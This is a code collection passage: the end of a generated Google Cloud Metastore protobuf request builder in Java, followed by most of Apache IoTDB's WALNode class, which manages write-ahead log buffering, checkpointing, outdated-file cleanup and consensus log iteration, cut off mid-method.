`projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The service to set. * @return This builder for chaining. */ public Builder setService(java.lang.String value) { if (value == null) { throw new NullPointerException(); } service_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearService() { service_ = getDefaultInstance().getService(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. The relative resource name of the metastore service to mutate * metadata, in the following format: * * `projects/{project_id}/locations/{location_id}/services/{service_id}`. * </pre> * * <code> * string service = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for service to set. * @return This builder for chaining. */ public Builder setServiceBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); service_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object resourceName_ = ""; /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The resourceName. */ public java.lang.String getResourceName() { java.lang.Object ref = resourceName_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); resourceName_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for resourceName. */ public com.google.protobuf.ByteString getResourceNameBytes() { java.lang.Object ref = resourceName_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); resourceName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The resourceName to set. * @return This builder for chaining. */ public Builder setResourceName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } resourceName_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearResourceName() { resourceName_ = getDefaultInstance().getResourceName(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Required. The relative metadata resource name in the following format. * * `databases/{database_id}` * or * `databases/{database_id}/tables/{table_id}` * or * `databases/{database_id}/tables/{table_id}/partitions/{partition_id}` * </pre> * * <code>string resource_name = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The bytes for resourceName to set. * @return This builder for chaining. */ public Builder setResourceNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); resourceName_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private java.lang.Object locationUri_ = ""; /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The locationUri. */ public java.lang.String getLocationUri() { java.lang.Object ref = locationUri_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); locationUri_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The bytes for locationUri. */ public com.google.protobuf.ByteString getLocationUriBytes() { java.lang.Object ref = locationUri_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); locationUri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The locationUri to set. * @return This builder for chaining. */ public Builder setLocationUri(java.lang.String value) { if (value == null) { throw new NullPointerException(); } locationUri_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearLocationUri() { locationUri_ = getDefaultInstance().getLocationUri(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Required. The new location URI for the metadata resource. * </pre> * * <code>string location_uri = 3 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The bytes for locationUri to set. * @return This builder for chaining. */ public Builder setLocationUriBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); locationUri_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) } // @@protoc_insertion_point(class_scope:google.cloud.metastore.v1.AlterMetadataResourceLocationRequest) private static final com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest(); } public static com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AlterMetadataResourceLocationRequest> PARSER = new com.google.protobuf.AbstractParser<AlterMetadataResourceLocationRequest>() { @java.lang.Override public AlterMetadataResourceLocationRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AlterMetadataResourceLocationRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AlterMetadataResourceLocationRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.metastore.v1.AlterMetadataResourceLocationRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/iotdb
35,952
iotdb-core/datanode/src/main/java/org/apache/iotdb/db/storageengine/dataregion/wal/node/WALNode.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iotdb.db.storageengine.dataregion.wal.node; import org.apache.iotdb.commons.consensus.DataRegionId; import org.apache.iotdb.commons.file.SystemFileFactory; import org.apache.iotdb.commons.utils.TestOnly; import org.apache.iotdb.consensus.common.request.IConsensusRequest; import org.apache.iotdb.consensus.common.request.IndexedConsensusRequest; import org.apache.iotdb.consensus.common.request.IoTConsensusRequest; import org.apache.iotdb.db.conf.IoTDBConfig; import org.apache.iotdb.db.conf.IoTDBDescriptor; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.PlanNodeType; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.ContinuousSameSearchIndexSeparatorNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.DeleteDataNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.InsertRowNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.InsertRowsNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.InsertTabletNode; import org.apache.iotdb.db.queryengine.plan.planner.plan.node.write.RelationalDeleteDataNode; import org.apache.iotdb.db.service.metrics.WritingMetrics; import org.apache.iotdb.db.storageengine.StorageEngine; import org.apache.iotdb.db.storageengine.dataregion.DataRegion; import org.apache.iotdb.db.storageengine.dataregion.flush.FlushStatus; import org.apache.iotdb.db.storageengine.dataregion.memtable.IMemTable; import org.apache.iotdb.db.storageengine.dataregion.wal.WALManager; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.IWALBuffer; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALBuffer; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALEntry; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALEntryType; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALInfoEntry; import org.apache.iotdb.db.storageengine.dataregion.wal.buffer.WALSignalEntry; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.Checkpoint; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.CheckpointManager; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.CheckpointType; import org.apache.iotdb.db.storageengine.dataregion.wal.checkpoint.MemTableInfo; import org.apache.iotdb.db.storageengine.dataregion.wal.io.WALByteBufReader; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.WALFileStatus; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.WALFileUtils; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.listener.AbstractResultListener; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.listener.AbstractResultListener.Status; import org.apache.iotdb.db.storageengine.dataregion.wal.utils.listener.WALFlushListener; import org.apache.tsfile.fileSystem.FSFactoryProducer; import org.apache.tsfile.utils.TsFileUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.File; import java.io.FileNotFoundException; import java.io.IOException; import java.nio.ByteBuffer; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.LinkedList; import java.util.List; import java.util.ListIterator; import java.util.Map; import java.util.NoSuchElementException; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicReference; import java.util.stream.Collectors; /** * This class encapsulates {@link IWALBuffer} and {@link CheckpointManager}. If search is enabled, * the order of search index should be protected by the upper layer, and the value should start from * 1. */ public class WALNode implements IWALNode { private static final Logger logger = LoggerFactory.getLogger(WALNode.class); private static final IoTDBConfig config = IoTDBDescriptor.getInstance().getConfig(); // no iot consensus, all insert nodes can be safely deleted public static final long DEFAULT_SAFELY_DELETED_SEARCH_INDEX = Long.MAX_VALUE; // timeout threshold when waiting for next wal entry private static final long WAIT_FOR_NEXT_WAL_ENTRY_TIMEOUT_IN_SEC = 30; private static final WritingMetrics WRITING_METRICS = WritingMetrics.getInstance(); // unique identifier of this WALNode private final String identifier; // directory to store this node's files private final File logDirectory; // wal buffer private final WALBuffer buffer; // manage checkpoints private final CheckpointManager checkpointManager; // memTable id -> memTable snapshot count // used to avoid write amplification caused by frequent snapshot private final Map<Long, Integer> memTableSnapshotCount = new ConcurrentHashMap<>(); // insert nodes whose search index are before this value can be deleted safely private volatile long safelyDeletedSearchIndex = DEFAULT_SAFELY_DELETED_SEARCH_INDEX; private volatile boolean deleted = false; public WALNode(String identifier, String logDirectory) throws IOException { this(identifier, logDirectory, 0, 0L); } public WALNode( String identifier, String logDirectory, long startFileVersion, long startSearchIndex) throws IOException { this.identifier = identifier; this.logDirectory = SystemFileFactory.INSTANCE.getFile(logDirectory); if (!this.logDirectory.exists() && this.logDirectory.mkdirs()) { logger.info("create folder {} for wal node-{}.", logDirectory, identifier); } this.checkpointManager = new CheckpointManager(identifier, logDirectory); this.buffer = new WALBuffer( identifier, logDirectory, checkpointManager, startFileVersion, startSearchIndex); } @Override public WALFlushListener log(long memTableId, InsertRowNode insertRowNode) { logger.debug( "WAL node-{} logs insertRowNode, the search index is {}.", identifier, insertRowNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, insertRowNode); return log(walEntry); } @Override public WALFlushListener log(long memTableId, InsertRowsNode insertRowsNode) { logger.debug( "WAL node-{} logs insertRowsNode, the search index is {}.", identifier, insertRowsNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, insertRowsNode); return log(walEntry); } @Override public WALFlushListener log( long memTableId, InsertTabletNode insertTabletNode, List<int[]> rangeList) { logger.debug( "WAL node-{} logs insertTabletNode, the search index is {}.", identifier, insertTabletNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, insertTabletNode, rangeList); return log(walEntry); } @Override public WALFlushListener log(long memTableId, DeleteDataNode deleteDataNode) { logger.debug( "WAL node-{} logs deleteDataNode, the search index is {}.", identifier, deleteDataNode.getSearchIndex()); WALEntry walEntry = new WALInfoEntry(memTableId, deleteDataNode); return log(walEntry); } @Override public WALFlushListener log(long memTableId, RelationalDeleteDataNode deleteDataNode) { if (logger.isDebugEnabled()) { logger.debug( "WAL node-{} logs relationalDeleteDataNode, the search index is {}.", identifier, deleteDataNode.getSearchIndex()); } WALEntry walEntry = new WALInfoEntry(memTableId, deleteDataNode); return log(walEntry); } @Override public WALFlushListener log( long memTableId, ContinuousSameSearchIndexSeparatorNode separatorNode) { WALEntry walEntry = new WALInfoEntry(memTableId, separatorNode); return log(walEntry); } private WALFlushListener log(WALEntry walEntry) { buffer.write(walEntry); // set handler for pipe return walEntry.getWalFlushListener(); } @Override public void onMemTableFlushStarted(IMemTable memTable) { // do nothing } @Override public void onMemTableFlushed(IMemTable memTable) { if (memTable.isSignalMemTable()) { return; } MemTableInfo memTableInfo = new MemTableInfo(memTable, null, -1); Checkpoint checkpoint = new Checkpoint(CheckpointType.FLUSH_MEMORY_TABLE, Collections.singletonList(memTableInfo)); buffer.write(new WALInfoEntry(memTable.getMemTableId(), checkpoint)); // remove snapshot info memTableSnapshotCount.remove(memTable.getMemTableId()); } @Override public void onMemTableCreated(IMemTable memTable, String targetTsFile) { if (memTable.isSignalMemTable()) { return; } // use current log version id as first file version id long firstFileVersionId = buffer.getCurrentWALFileVersion(); MemTableInfo memTableInfo = new MemTableInfo(memTable, targetTsFile, firstFileVersionId); checkpointManager.makeCreateMemTableCPInMemory(memTableInfo); Checkpoint checkpoint = new Checkpoint(CheckpointType.CREATE_MEMORY_TABLE, Collections.singletonList(memTableInfo)); buffer.write(new WALInfoEntry(memTable.getMemTableId(), checkpoint)); } public void setDeleted(boolean deleted) { this.deleted = deleted; } // region methods for pipe // endregion // region Task to delete outdated .wal files /** Delete outdated .wal files. */ public void deleteOutdatedFiles() { try { new DeleteOutdatedFileTask().run(); } catch (Exception e) { logger.error("Fail to delete wal node-{}'s outdated files.", identifier, e); } } private class DeleteOutdatedFileTask implements Runnable { private File[] sortedWalFilesExcludingLast; private List<MemTableInfo> activeOrPinnedMemTables; private static final int MAX_RECURSION_TIME = 5; // the effective information ratio private double effectiveInfoRatio = 1.0d; private int fileIndexAfterFilterSafelyDeleteIndex = Integer.MAX_VALUE; private List<Long> successfullyDeleted; private long deleteFileSize; private int recursionTime = 0; public DeleteOutdatedFileTask() { // Do nothing } private boolean initAndCheckIfNeedContinue() { rollWalFileIfHaveNoActiveMemTable(); File[] allWalFilesOfOneNode = WALFileUtils.listAllWALFiles(logDirectory); if (allWalFilesOfOneNode == null || allWalFilesOfOneNode.length <= 1) { if (logger.isDebugEnabled()) { logger.debug( "wal node-{}:no wal file or wal file number less than or equal to one was found", identifier); } return false; } WALFileUtils.ascSortByVersionId(allWalFilesOfOneNode); this.sortedWalFilesExcludingLast = Arrays.copyOfRange(allWalFilesOfOneNode, 0, allWalFilesOfOneNode.length - 1); this.activeOrPinnedMemTables = checkpointManager.activeOrPinnedMemTables(); this.fileIndexAfterFilterSafelyDeleteIndex = initFileIndexAfterFilterSafelyDeleteIndex(); this.successfullyDeleted = new ArrayList<>(); this.deleteFileSize = 0; return true; } /** * This means that the relevant memTable in the file has been successfully flushed, so we should * scroll through a new wal file so that the current file can be deleted */ public void rollWalFileIfHaveNoActiveMemTable() { long firstVersionId = checkpointManager.getFirstValidWALVersionId(); if (firstVersionId == Long.MIN_VALUE) { // roll wal log writer to delete current wal file if (buffer.getCurrentWALOriginalFileSize() > 0) { rollWALFile(); } } } @Override public void run() { // The intent of the loop execution here is to try to get as many memTable flush or snapshot // as possible when the valid information ratio is less than the configured value. while (recursionTime < MAX_RECURSION_TIME) { // init delete outdated file task fields, if the number of wal files is less than one, the // subsequent logic is not executed if (!initAndCheckIfNeedContinue()) { break; } // delete outdated WAL files and record which delete successfully and which delete failed. deleteOutdatedFilesAndUpdateMetric(); // summary the execution result and output a log summarizeExecuteResult(); // update current effective info ration updateEffectiveInfoRationAndUpdateMetric(); // decide whether to snapshot or flush based on the effective info ration and throttle // threshold if (trySnapshotOrFlushMemTable() && safelyDeletedSearchIndex != DEFAULT_SAFELY_DELETED_SEARCH_INDEX) { return; } recursionTime++; } } private void updateEffectiveInfoRationAndUpdateMetric() { // calculate effective information ratio long costOfActiveMemTables = checkpointManager.getTotalCostOfActiveMemTables(); MemTableInfo oldestUnpinnedMemTableInfo = checkpointManager.getOldestMemTableInfo(); long avgFileSize = getFileNum() != 0 ? getDiskUsage() / getFileNum() : config.getWalFileSizeThresholdInByte(); long totalCost = oldestUnpinnedMemTableInfo == null ? costOfActiveMemTables : (getCurrentWALFileVersion() - oldestUnpinnedMemTableInfo.getFirstFileVersionId()) * avgFileSize; if (costOfActiveMemTables == 0 || totalCost == 0) { effectiveInfoRatio = 1.0d; return; } effectiveInfoRatio = (double) costOfActiveMemTables / totalCost; logger.debug( "Effective information ratio is {}, active memTables cost is {}, total cost is {}", effectiveInfoRatio, costOfActiveMemTables, totalCost); WRITING_METRICS.recordWALNodeEffectiveInfoRatio(identifier, effectiveInfoRatio); } private void summarizeExecuteResult() { logger.debug( "Successfully delete {} outdated wal files for wal node-{}", successfullyDeleted.size(), identifier); } /** Delete obsolete wal files while recording which succeeded or failed */ private void deleteOutdatedFilesAndUpdateMetric() { for (int fileArrIdx = 0; fileArrIdx < sortedWalFilesExcludingLast.length; ++fileArrIdx) { File currentWal = sortedWalFilesExcludingLast[fileArrIdx]; WALFileStatus walFileStatus = WALFileUtils.parseStatusCode(currentWal.getName()); long versionId = WALFileUtils.parseVersionId(currentWal.getName()); if (canDeleteFile(fileArrIdx, walFileStatus, versionId)) { long fileSize = currentWal.length(); if (currentWal.delete()) { deleteFileSize += fileSize; buffer.removeMemTableIdsOfWal(versionId); successfullyDeleted.add(versionId); } else { logger.info( "Fail to delete outdated wal file {} of wal node-{}.", currentWal, identifier); } } } buffer.subtractDiskUsage(deleteFileSize); buffer.subtractFileNum(successfullyDeleted.size()); } private int initFileIndexAfterFilterSafelyDeleteIndex() { return safelyDeletedSearchIndex == DEFAULT_SAFELY_DELETED_SEARCH_INDEX ? sortedWalFilesExcludingLast.length : WALFileUtils.binarySearchFileBySearchIndex( sortedWalFilesExcludingLast, safelyDeletedSearchIndex + 1); } /** Return true iff effective information ratio is too small or disk usage is too large. */ private boolean shouldSnapshotOrFlush() { return effectiveInfoRatio < config.getWalMinEffectiveInfoRatio() || WALManager.getInstance().shouldThrottle(); } /** * Snapshot or flush one memTable. * * @return true if snapshot or flush is executed successfully */ private boolean trySnapshotOrFlushMemTable() { if (!shouldSnapshotOrFlush()) { return false; } // find oldest memTable MemTableInfo oldestMemTableInfo = checkpointManager.getOldestMemTableInfo(); if (oldestMemTableInfo == null) { return false; } IMemTable oldestMemTable = oldestMemTableInfo.getMemTable(); if (oldestMemTable == null) { return false; } // get memTable's virtual database processor File oldestTsFile = FSFactoryProducer.getFSFactory().getFile(oldestMemTableInfo.getTsFilePath()); DataRegion dataRegion; try { dataRegion = StorageEngine.getInstance() .getDataRegion(new DataRegionId(TsFileUtils.getDataRegionId(oldestTsFile))); } catch (Exception e) { logger.error("Fail to get data region processor for {}", oldestTsFile, e); return false; } if (dataRegion == null) { return false; } // snapshot or flush memTable, flush memTable when it belongs to an old time partition, or // it's snapshot count or size reach threshold. int snapshotCount = memTableSnapshotCount.getOrDefault(oldestMemTable.getMemTableId(), 0); long oldestMemTableTVListsRamCost = oldestMemTable.getTVListsRamCost(); if (TsFileUtils.getTimePartition(new File(oldestMemTableInfo.getTsFilePath())) < dataRegion.getLatestTimePartition() || snapshotCount >= config.getMaxWalMemTableSnapshotNum() || oldestMemTableTVListsRamCost > config.getWalMemTableSnapshotThreshold()) { flushMemTable(dataRegion, oldestTsFile, oldestMemTable); WRITING_METRICS.recordWalFlushMemTableCount(1); WRITING_METRICS.recordMemTableRamWhenCauseFlush(identifier, oldestMemTableTVListsRamCost); } else { snapshotMemTable(dataRegion, oldestTsFile, oldestMemTableInfo); } return true; } private void flushMemTable(DataRegion dataRegion, File tsFile, IMemTable memTable) { boolean submitted = true; if (memTable.getFlushStatus() == FlushStatus.WORKING) { submitted = dataRegion.submitAFlushTask( TsFileUtils.getTimePartition(tsFile), TsFileUtils.isSequence(tsFile), memTable); logger.info( "WAL node-{} flushes memTable-{} to TsFile {} because Effective information ratio {} is below wal min effective info ratio {}, memTable size is {}.", identifier, memTable.getMemTableId(), tsFile, String.format("%.4f", effectiveInfoRatio), config.getWalMinEffectiveInfoRatio(), memTable.getTVListsRamCost()); } // it's fine to wait until memTable has been flushed, because deleting files is not urgent. if (submitted || memTable.getFlushStatus() == FlushStatus.FLUSHING) { long sleepTime = 0; while (memTable.getFlushStatus() != FlushStatus.FLUSHED) { try { Thread.sleep(1_000); sleepTime += 1_000; if (sleepTime > 10_000) { logger.warn("Waiting too long for memTable flush to be done."); break; } } catch (InterruptedException e) { logger.warn("Interrupted when waiting for memTable flush to be done."); Thread.currentThread().interrupt(); } } } } // synchronize memTable to make sure snapshot is made before memTable flush operation @SuppressWarnings("java:S2445") private void snapshotMemTable(DataRegion dataRegion, File tsFile, MemTableInfo memTableInfo) { IMemTable memTable = memTableInfo.getMemTable(); // get dataRegion write lock to make sure no more writes to the memTable dataRegion.writeLock( "CheckpointManager$DeleteOutdatedFileTask.snapshotOrFlushOldestMemTable"); try { // make sure snapshot is made before memTable flush operation synchronized (memTableInfo) { if (memTable == null || memTable.getFlushStatus() != FlushStatus.WORKING) { return; } // update snapshot count memTableSnapshotCount.compute(memTable.getMemTableId(), (k, v) -> v == null ? 1 : v + 1); // roll wal log writer to make sure first version id will be updated WALEntry rollWALFileSignal = new WALSignalEntry(WALEntryType.ROLL_WAL_LOG_WRITER_SIGNAL, true); WALFlushListener fileRolledListener = log(rollWALFileSignal); if (fileRolledListener.waitForResult() == Status.FAILURE) { logger.error("Fail to roll wal log writer.", fileRolledListener.getCause()); return; } // update first version id first to make sure snapshot is in the files ≥ current log // version memTableInfo.setFirstFileVersionId(buffer.getCurrentWALFileVersion()); // log snapshot in a new .wal file WALEntry walEntry = new WALInfoEntry(memTable.getMemTableId(), memTable, true); WALFlushListener flushListener = log(walEntry); // wait until getting the result // it's low-risk to block writes awhile because this memTable accumulates slowly if (flushListener.waitForResult() == Status.FAILURE) { logger.error("Fail to snapshot memTable of {}", tsFile, flushListener.getCause()); return; } logger.info( "WAL node-{} snapshots memTable-{} to wal files because Effective information ratio {} is below wal min effective info ratio {}, memTable size is {}.", identifier, memTable.getMemTableId(), String.format("%.4f", effectiveInfoRatio), config.getWalMinEffectiveInfoRatio(), memTable.getTVListsRamCost()); WRITING_METRICS.recordMemTableRamWhenCauseSnapshot( identifier, memTable.getTVListsRamCost()); } } finally { dataRegion.writeUnlock(); } } public boolean isContainsActiveOrPinnedMemTable(Long versionId) { Set<Long> memTableIdsOfCurrentWal = buffer.getMemTableIds(versionId); // If this set is empty, there is a case where WalEntry has been logged but not persisted, // because WalEntry is persisted asynchronously. In this case, the file cannot be deleted // directly, so it is considered active if (memTableIdsOfCurrentWal == null) { return true; } return !Collections.disjoint( activeOrPinnedMemTables.stream() .map(MemTableInfo::getMemTableId) .collect(Collectors.toSet()), memTableIdsOfCurrentWal); } private boolean canDeleteFile(long fileArrIdx, WALFileStatus walFileStatus, long versionId) { return (fileArrIdx < fileIndexAfterFilterSafelyDeleteIndex || walFileStatus == WALFileStatus.CONTAINS_NONE_SEARCH_INDEX) && !isContainsActiveOrPinnedMemTable(versionId); } } // endregion // region Search interfaces for consensus group @Override public void setSafelyDeletedSearchIndex(long safelyDeletedSearchIndex) { this.safelyDeletedSearchIndex = safelyDeletedSearchIndex; } /** This iterator is not concurrency-safe, cannot read the current-writing wal file. */ @Override public ReqIterator getReqIterator(long startIndex) { return new PlanNodeIterator(startIndex); } private class PlanNodeIterator implements ReqIterator { /** search index of next element */ private long nextSearchIndex; /** files to search */ private File[] filesToSearch = null; /** index of current searching file in the filesToSearch */ private int currentFileIndex = -1; /** true means filesToSearch and currentFileIndex are outdated, call updateFilesToSearch */ private boolean needUpdatingFilesToSearch = true; /** batch store insert nodes */ private final LinkedList<IndexedConsensusRequest> insertNodes = new LinkedList<>(); /** iterator of insertNodes */ private ListIterator<IndexedConsensusRequest> itr = null; /** last broken wal file's version id */ private long brokenFileId = -1; public PlanNodeIterator(long startIndex) { this.nextSearchIndex = startIndex; } @Override public boolean hasNext() { if (itr != null && itr.hasNext()) { return true; } // clear outdated iterator insertNodes.clear(); itr = null; if (filesToSearch == null || currentFileIndex >= filesToSearch.length - 1) { needUpdatingFilesToSearch = true; } // update files to search if (needUpdatingFilesToSearch) { updateFilesToSearch(); if (needUpdatingFilesToSearch) { logger.debug( "update file to search failed, the next search index is {}", nextSearchIndex); return false; } } // find file contains search index while (WALFileUtils.parseStatusCode(filesToSearch[currentFileIndex].getName()) == WALFileStatus.CONTAINS_NONE_SEARCH_INDEX) { currentFileIndex++; if (currentFileIndex >= filesToSearch.length - 1) { needUpdatingFilesToSearch = true; return false; } } /* ------ find all nodes from all wal file ------ */ AtomicReference<List<IConsensusRequest>> tmpNodes = new AtomicReference<>(new ArrayList<>()); AtomicBoolean notFirstFile = new AtomicBoolean(false); AtomicBoolean hasCollectedSufficientData = new AtomicBoolean(false); // try to collect current tmpNodes to insertNodes, return true if successfully collect an // insert node Runnable tryToCollectInsertNodeAndBumpIndex = () -> { if (!tmpNodes.get().isEmpty()) { insertNodes.add(new IndexedConsensusRequest(nextSearchIndex, tmpNodes.get())); tmpNodes.set(new ArrayList<>()); nextSearchIndex++; if (notFirstFile.get()) { hasCollectedSufficientData.set(true); } } }; COLLECT_FILE_LOOP: for (; currentFileIndex < filesToSearch.length - 1; currentFileIndex++) { // cannot find any in this file, so all slices of last plan node are found if (WALFileUtils.parseStatusCode(filesToSearch[currentFileIndex].getName()) == WALFileStatus.CONTAINS_NONE_SEARCH_INDEX) { tryToCollectInsertNodeAndBumpIndex.run(); continue; } try (WALByteBufReader walByteBufReader = new WALByteBufReader(filesToSearch[currentFileIndex])) { while (walByteBufReader.hasNext()) { ByteBuffer buffer = walByteBufReader.next(); WALEntryType type = WALEntryType.valueOf(buffer.get()); if (type.needSearch()) { // see WALInfoEntry#serialize, entry type + memtable id + plan node type buffer.position(WALInfoEntry.FIXED_SERIALIZED_SIZE + PlanNodeType.BYTES); final long currentWalEntryIndex = buffer.getLong(); buffer.clear(); if (currentWalEntryIndex == -1) { // WAL entry of targetIndex has been fully collected, so put them into insertNodes tryToCollectInsertNodeAndBumpIndex.run(); } else if (currentWalEntryIndex < nextSearchIndex) { // WAL entry is outdated, do nothing, continue to see next WAL entry } else if (currentWalEntryIndex == nextSearchIndex) { tmpNodes.get().add(new IoTConsensusRequest(buffer)); } else { // currentWalEntryIndex > targetIndex // WAL entry of targetIndex has been fully collected, put them into insertNodes tryToCollectInsertNodeAndBumpIndex.run(); if (currentWalEntryIndex != nextSearchIndex) { logger.warn( "The search index of next WAL entry should be {}, but actually it's {}", nextSearchIndex, currentWalEntryIndex); nextSearchIndex = currentWalEntryIndex; } tmpNodes.get().add(new IoTConsensusRequest(buffer)); } } else { tryToCollectInsertNodeAndBumpIndex.run(); } if (hasCollectedSufficientData.get()) { break COLLECT_FILE_LOOP; } } } catch (Exception e) { brokenFileId = WALFileUtils.parseVersionId(filesToSearch[currentFileIndex].getName()); logger.error( "Fail to read wal from wal file {}, skip this file.", filesToSearch[currentFileIndex], e); } notFirstFile.set(true); } // update file index and version id if (currentFileIndex >= filesToSearch.length - 1) { 